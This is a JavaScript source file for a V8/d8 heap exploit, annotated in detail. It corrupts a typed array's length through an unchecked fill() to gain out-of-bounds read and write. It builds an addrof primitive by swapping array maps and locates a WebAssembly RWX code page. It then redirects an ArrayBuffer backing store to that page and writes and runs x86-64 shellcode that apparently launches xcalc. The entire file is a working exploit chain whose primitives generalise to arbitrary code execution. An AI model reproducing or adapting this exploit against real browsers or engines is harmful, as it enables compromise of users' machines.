// Exploit-global state for a V8/d8 heap exploit. Every later "offset" (0x84, 0xb4,
// the *_gap values) indexes `writer` past its 8 bytes into whatever the heap placed
// after it, so these declarations are layout-sensitive: keep their order.
var writer = new Uint8Array(8);          // becomes the OOB read/write primitive once its length is clobbered by the fill() below
var aux_obj = {"a": 1};                  // seed element so aux_obj_arr is created as an array of objects
var aux_obj_arr = [aux_obj];             // slot 0 is reused by addrof(); its map is read at offset 0x84
var aux_float_arr = [1.1, 2.2, 3.3];     // never read directly; its map (offset 0xb4) is borrowed for the type confusion
var buf = new ArrayBuffer(8);            // shared 8-byte scratch for ftoi(): same memory viewed as a double ...
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);      // ... and as two 32-bit words (note: Uint32, not Uint64, despite the name)
/**
 * Reinterpret the bit pattern of a double.
 *
 * Only the low 32 bits of the IEEE-754 encoding are returned: `u64_buf` is a
 * Uint32Array despite its name, and addrof() wants exactly that half (the
 * compressed pointer) of the leaked value.
 *
 * @param {number} val - double whose encoding is read (non-numbers go through ToNumber)
 * @returns {bigint} the first 32-bit word of `val`'s encoding, in host byte order
 */
function ftoi(val) {
  f64_buf.set([val]);
  const [lowWord] = u64_buf;
  return BigInt(lowWord);
}
// Trigger the bug: a fill() that the vulnerable build does not bounds-check. It
// writes 0xff over bytes 40..42 past writer's 8-byte store, which (per the original
// author) lands on the typed array's length field and turns `writer` into an
// out-of-bounds read/write over the heap that follows it. On a patched V8 the fill
// is clipped to the array, writer[0x34] reads undefined and BigInt(NaN) on the next
// line throws a RangeError — a quick sign that the primitive is gone.
writer.fill(0xff, 40, 43); // Overwrite writer's (Uint8Array(8)) length field
// Leak the pointer-compression cage base: the two bytes at 0x34..0x35 become bits
// 32..47 of the isolate root. Bits 48..63 are assumed zero (holds for canonical
// user-space addresses on x86-64 — confirm for the target).
var isolate_root = BigInt((writer[0x35] << 8) + writer[0x34]);
isolate_root = isolate_root << 32n;
console.log("[+] Isolate root: 0x" + isolate_root.toString(16))
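/**
 * Read a little-endian 32-bit value at byte offset `idx` of `writer`.
 *
 * With `compressed` (the default) the value is treated as a V8 compressed,
 * tagged pointer: it is untagged (-1) and rebased on `isolate_root`, giving a
 * full 64-bit address. With `compressed = false` the raw 32-bit value is returned.
 *
 * Bytes are assembled in BigInt. The previous Number shift of the top byte
 * (`b << 24`) is a *signed* 32-bit operation: for bytes >= 0x80 it went negative
 * and, on the compressed path, knocked 2^32 off the rebased address (the raw
 * path was saved by its asUintN(32) wrap). `>>> 0` also maps an out-of-range read
 * (undefined) to 0, matching the original's tolerant behaviour.
 *
 * @param {number} idx - byte offset into `writer` (may exceed its length once the OOB primitive is live)
 * @param {boolean} [compressed=true] - decode as a compressed tagged pointer
 * @returns {bigint} 64-bit address (compressed) or unsigned 32-bit value (raw)
 */
function read32offset(idx, compressed = true) {
  let value = compressed ? isolate_root : 0n;
  for (let i = 0; i < 4; i++) {
    value += BigInt(writer[idx + i] >>> 0) << BigInt(8 * i);
  }
  return compressed ? BigInt.asUintN(64, value - 1n) : BigInt.asUintN(32, value);
}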
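/**
 * Store the low 32 bits of `data` little-endian at byte offset `idx` of `writer`.
 *
 * Bits above 31 are ignored; write64offset() splits wider values into two calls.
 * Each byte is masked in BigInt (`& 0xffn`) *before* the Number conversion:
 * Number() of a BigInt above 2^53 rounds, so masking after the conversion (as the
 * previous version did) could emit wrong low bytes for wide values.
 *
 * @param {number} idx - byte offset into `writer` (may exceed its length once the OOB primitive is live)
 * @param {bigint} data - value whose low 32 bits are written
 */
function write32offset(idx, data) {
  for (let i = 0; i < 4; i++) {
    writer[idx + i] = Number((data >> (8n * BigInt(i))) & 0xffn);
  }
}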
/**
 * Store a 64-bit value little-endian at byte offset `idx` of `writer`, as two
 * 32-bit halves written through write32offset() (low dword first).
 *
 * @param {number|bigint} idx - byte offset; the *_gap values below are BigInt, hence the Number() conversion
 * @param {bigint} data - 64-bit value to write
 */
function write64offset(idx, data) {
  const base = Number(idx);
  const halves = [
    data & 0x00000000ffffffffn,            // low dword at base
    (data & 0xffffffff00000000n) >> 32n,   // high dword at base + 4
  ];
  halves.forEach((half, k) => write32offset(base + 4 * k, half));
}
// Leak the two array maps through the OOB read. 0x84 and 0xb4 are the distances
// from writer's data to what are presumably the map slots of aux_obj_arr and
// aux_float_arr on the target d8 build; they are layout-specific and must be
// re-derived for any other binary. read32offset() strips the pointer tag, so the
// +1n is re-added when a map is written back in addrof().
var obj_arr_map = read32offset(0x84);
var float_arr_map = read32offset(0xb4);
console.log("[+] Object array map: 0x" + obj_arr_map.toString(16));
console.log("[+] Float array map: 0x" + float_arr_map.toString(16));
/**
 * Leak the address of `obj`.
 *
 * Places `obj` in slot 0 of the object array, uses the OOB write to swap that
 * array's map (at offset 0x84, where it was read from above) for the float
 * array's map so the slot reads back as a raw double, restores the map, and
 * rebases the leaked compressed pointer on the isolate root (untagging with -1).
 *
 * @param {*} obj - object (or value) to locate
 * @returns {bigint} 64-bit address of `obj`
 */
function addrof(obj) {
  aux_obj_arr[0] = obj;
  write32offset(0x84, float_arr_map + 1n);   // type-confuse: elements now read as doubles
  const leakedAsDouble = aux_obj_arr[0];
  write32offset(0x84, obj_arr_map + 1n);     // restore the real map before anything else touches the array
  const compressedPtr = ftoi(leakedAsDouble);
  return isolate_root + compressedPtr - 1n;
}
// Minimal WebAssembly module: one function `main` of type () -> i32 whose body is
// just `i32.const 0`, exported together with `memory`. It exists only so V8 compiles
// a function into an RWX code page; `main` is called at the end, after that page has
// been overwritten with shellcode.
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,
130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,
128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,
128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,
0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]);
var wasm_module = new WebAssembly.Module(wasmCode);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var pwn = wasm_instance.exports.main;
// Locate the RWX page: read the raw 64-bit field at wasm_instance + 0x78 (presumably
// the instance's code/jump-table pointer on the target build — confirm for others).
// Offsets are relative to writer's data, which starts 8 bytes past addrof(writer).
var rwx_gap = addrof(wasm_instance) + 0x78n - addrof(writer) - 0x8n;
var rwx = (read32offset(Number(rwx_gap) + 4, false) << 32n) + read32offset(Number(rwx_gap), false);
console.log("[+] RWX section: 0x" + rwx.toString(16));
// Arbitrary write: redirect an ArrayBuffer's backing-store pointer (at +0x24 on the
// target build) to the RWX page, so a DataView over it writes straight into code.
var arr_buf = new ArrayBuffer(0x100);
var dataview = new DataView(arr_buf);
var back_store_gap = addrof(arr_buf) + 0x24n - addrof(writer) - 0x8n;
var back_store_addr = (read32offset(Number(back_store_gap) + 4, false) << 32n) + read32offset(Number(back_store_gap), false);
console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16));
write64offset(back_store_gap, rwx);
// x86-64 Linux shellcode as little-endian dwords (two NOP dwords first). From the
// embedded strings and the final `mov eax, 0x3b; syscall` it appears to execve
// /usr/bin/xcalc with DISPLAY=:0 — disassemble before reusing it elsewhere.
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,
0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,
0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
// Each dword is written little-endian (the `true` argument) into the hijacked buffer,
// i.e. directly into the RWX page.
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4 * i, shellcode[i], true);
}
console.log("[*] Spawning a calculator...");
// main() now jumps into the overwritten code page.
pwn();